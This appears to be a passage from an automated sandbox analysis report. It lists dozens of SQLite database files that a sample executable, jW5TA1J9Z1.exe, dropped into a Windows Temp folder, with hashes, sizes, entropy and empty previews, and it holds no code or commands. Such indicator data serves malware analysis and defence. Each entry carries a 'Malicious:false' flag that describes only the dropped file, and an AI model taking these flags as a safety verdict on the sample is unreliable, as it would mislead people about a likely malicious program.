                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Xx28u3kHQZ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Y6YkIEJpgo

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\YAIOHmmwjm

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\YDB6LlRtYZ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\YDvJNBZTTu

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\YRNIRzMrop

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ZC1uK6hBGf

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ZXekimL3VX

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Zkk236ugB1

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Zr7Az7G8td

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Zu952VkIBn

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\aRIwdeV8Fu

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\aZkrsx4ZZo

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\acL6GOsMHN

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\aqSGNy5EP4

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bCTvnHxRfc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bhKgqFqtTR

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bjh4Fbl56g

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bxaCf7FdaY

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\byb2dXnZDt

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\c0PDtJwSaj

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\c7TI10ZHHS

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\c9st6hDtgT

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\cOapRkECG1

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
